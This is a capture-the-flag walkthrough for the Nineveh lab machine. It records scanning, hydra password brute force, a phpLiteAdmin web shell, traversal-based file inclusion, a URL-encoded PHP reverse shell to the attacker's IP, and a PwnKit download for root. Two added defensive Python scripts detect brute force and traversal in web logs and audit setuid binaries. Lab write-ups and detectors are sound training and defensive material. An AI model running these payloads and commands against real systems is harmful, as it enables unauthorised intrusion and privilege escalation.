
Ping

ping 10.10.10.43

Nmap Default Scan

nmap 10.10.10.43 -oN dnmap

Nmap Script and Service Scan

nmap 10.10.10.43 -sC -sV -A -oN snmap

Nmap All Port Scan

nmap 10.10.10.43 -p- --open -T5 -oN anmap

On port 443 https://10.10.10.43

On Port 80 http://10.10.10.43

Gobuster Scan

gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt

http://10.10.10.43/department

From the page source we can assume MySQL is installed on the server and there is a user named amrois

Will try SQL injection using the gathered information, but SQL injection didn't work

Tried brute force with user amrois, no luck

Will try brute force with user admin. Captured the login form

Brute force using hydra's http-post-form module

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form '/department/login.php:username=^USER^&password=^PASS^:Invalid Password!'

Found valid creds admin:1q2w3e4r5t

Successfully logged in as Admin

Notes

After some enumeration, I can’t progress further

Will Enumerate port 443

gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster443.txt

https://10.10.10.43/db

We can see the phpLiteAdmin version, will search for any public exploit.

Found one https://www.exploit-db.com/exploits/24044

Before that we need to find the password to log in, will use hydra again, this time with https-post-form

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form '/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.'

Logged in as admin

Now will follow the steps in the exploit https://www.exploit-db.com/exploits/24044

Following the steps, created a database named hack.php, a table named pwn and a field named 1

Now have to insert malicious php code to get RCE

<?php echo system($_REQUEST ["cmd"]); ?>

We have RCE now

http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../../../../../../var/tmp/hack.php&cmd=id

Will get a reverse shell, using a PHP reverse shell with URL encoding

10.10.10.43/department/manage.php?notes=/ninevehNotes/../../../../../../var/tmp/hack.php&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.6%22%2C4444%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
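From the defender's side, the two things the notes above leave in the web server log are a burst of POSTs to a login form (the hydra runs against /department/login.php and /db/index.php) and a GET whose query string carries `../` sequences plus a `cmd` parameter (the manage.php requests). The script below is an added example, not part of the original write-up or of the box, that scans access-log lines for both patterns. It generalises slightly: it decodes URL-encoded (and double-encoded) traversal, and the login paths, threshold and window are assumptions you would tune. The log lines are constructed for the example; only the manage.php query string is taken from the page.

```python
"""Added example: detect login brute force and directory traversal in combined-format access logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined log format: ip ident user [ts] "METHOD url proto" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

LOGIN_PATHS = {"/department/login.php", "/db/index.php"}  # the two forms attacked in the walkthrough
SUSPECT_PARAMS = {"cmd"}                                   # parameter name used on the page
BRUTE_THRESHOLD = 20                                       # assumption: tune to your traffic
BRUTE_WINDOW = timedelta(seconds=60)


def parse_line(line):
    """Return a dict for a well-formed line, or None so malformed lines are skipped."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], TS_FMT)
    return d


def has_traversal(url):
    """True if any query value contains '../' or '..\\' after decoding twice (catches %2e%2e%2f and %252e...)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for values in qs.values():
        for v in values:
            decoded = unquote(unquote(v))
            if "../" in decoded or "..\\" in decoded:
                return True
    return False


def suspect_params(url):
    """Query parameter names from SUSPECT_PARAMS present in the URL."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(k for k in qs if k.lower() in SUSPECT_PARAMS)


def detect_bruteforce(events):
    """(ip, login path) pairs with >= BRUTE_THRESHOLD POSTs inside a sliding BRUTE_WINDOW."""
    by_key = defaultdict(list)
    for e in events:
        path = urlsplit(e["url"]).path
        if e["method"] == "POST" and path in LOGIN_PATHS:
            by_key[(e["ip"], path)].append(e["ts"])
    hits = []
    for key, times in by_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > BRUTE_WINDOW:
                start += 1
            if end - start + 1 >= BRUTE_THRESHOLD:
                hits.append(key)
                break
    return sorted(hits)


def detect_traversal(events):
    """(ip, url) for requests carrying traversal sequences or a suspect parameter."""
    return [(e["ip"], e["url"]) for e in events if has_traversal(e["url"]) or suspect_params(e["url"])]


def analyse(lines):
    events = [e for e in (parse_line(l) for l in lines) if e]
    return {"bruteforce": detect_bruteforce(events), "traversal": detect_traversal(events)}


# ---- constructed sample log, not captured from the box ----
_BASE = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)


def _line(ip, offset, method, url, status):
    ts = (_BASE + timedelta(seconds=offset)).strftime(TS_FMT)
    return f'{ip} - - [{ts}] "{method} {url} HTTP/1.1" {status} 512'


SAMPLE_LINES = [_line("10.10.14.6", i * 2, "POST", "/department/login.php", 200) for i in range(25)] + [
    _line("192.168.1.20", 5, "GET", "/department/manage.php?notes=files/ninevehNotes.txt", 200),
    _line("10.10.14.6", 90, "GET",
          "/department/manage.php?notes=/ninevehNotes/../../../../../../var/tmp/hack.php&cmd=id", 200),
    _line("10.10.14.6", 95, "GET",
          "/department/manage.php?notes=%2fninevehNotes%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", 200),
    "this line is not in combined format and is skipped",
]

if __name__ == "__main__":
    for kind, hits in analyse(SAMPLE_LINES).items():
        print(kind, hits)
```

The brute-force rule keys on (source IP, login path) so a single slow attacker across both forms is still visible; in practice you would also alert on the response that marks success (the status or size changes once a valid password is found). The traversal check decodes twice on purpose, since a `%252e` sequence reaches the application as `%2e` and is decoded again there.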

Got reverse shell and upgraded my shell using python

rlwrap nc -nvlp 4444
python3 -c 'import pty; pty.spawn("/bin/bash")'

Can’t read user.txt

Will jump to Privilege Escalation…!

We can't list our sudo permissions; it asks for a password

Will check for SUID binaries

find / -perm -u=s -type f 2>/dev/null

We can see pkexec, will check its version

pkexec --version

Running a vulnerable version, will try PwnKit

Transferring PwnKit to target machine

wget 10.10.14.6/PwnKit

Change permissions and execute the binary

chmod +x PwnKit
./PwnKit
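The `find / -perm -u=s` step above is exactly what a defender should run on a schedule: a setuid-root inventory diffed against a known-good baseline catches both an unexpected setuid helper and a package update that re-adds one. The script below is an added example, not part of the original walkthrough, that does that inventory from Python; the baseline paths and sample entries are assumptions constructed for the example. It also computes the interim hardening for a setuid binary you cannot patch yet (clearing the setuid bit, which is the mitigation published for pkexec while the PwnKit fix was rolled out), but the real fix is the distribution's patched package.

```python
"""Added example: setuid-root audit against a baseline, plus the mode change that drops the setuid bit."""
import os
import stat

# Pseudo-filesystems that a walk should not descend into (same spirit as 2>/dev/null in the page's find)
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_setuid_root(mode, uid):
    """Regular file, setuid bit set, owned by root: the files `find / -perm -u=s -type f` reports for uid 0."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def collect(root="/"):
    """Yield (path, st_mode, st_uid) for every regular file under root; unreadable entries are skipped."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


def audit(entries, baseline):
    """Return (unexpected, missing): setuid-root files absent from the baseline, and baseline files no longer setuid."""
    found = {path for path, mode, uid in entries if is_setuid_root(mode, uid)}
    return sorted(found - baseline), sorted(baseline - found)


def dropped_mode(mode):
    """Mode with the setuid bit cleared, e.g. 0o104755 -> 0o100755 (what `chmod u-s` applies)."""
    return mode & ~stat.S_ISUID


def harden(path, apply=False):
    """Clear setuid on path; with apply=False only report the chmod that would run."""
    st = os.lstat(path)
    new_mode = stat.S_IMODE(dropped_mode(st.st_mode))
    if apply:
        os.chmod(path, new_mode)
    return f"chmod {new_mode:04o} {path}"


# Constructed sample inventory (assumed paths, not taken from the box) and an assumed baseline
SAMPLE_ENTRIES = [
    ("/usr/bin/pkexec", 0o104755, 0),
    ("/usr/bin/passwd", 0o104755, 0),
    ("/bin/ls", 0o100755, 0),
    ("/home/amrois/tool", 0o104755, 1000),  # setuid but not root-owned: not a root escalation path
]
SAMPLE_BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo"}

if __name__ == "__main__":
    unexpected, missing = audit(SAMPLE_ENTRIES, SAMPLE_BASELINE)
    print("unexpected setuid-root:", unexpected)
    print("missing from baseline:", missing)
    # On a live host: audit(collect("/"), baseline_loaded_from_file)
```

Run `collect("/")` as root once on a freshly installed host to produce the baseline, store it with your configuration management, and alert on any non-empty `unexpected` list. Version strings from `pkexec --version` are a poor substitute for this check because distributions backport fixes without bumping the upstream version.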

Coool..! We ARe Ro0t

root.txt

User.txt

Done with Nineveh…:)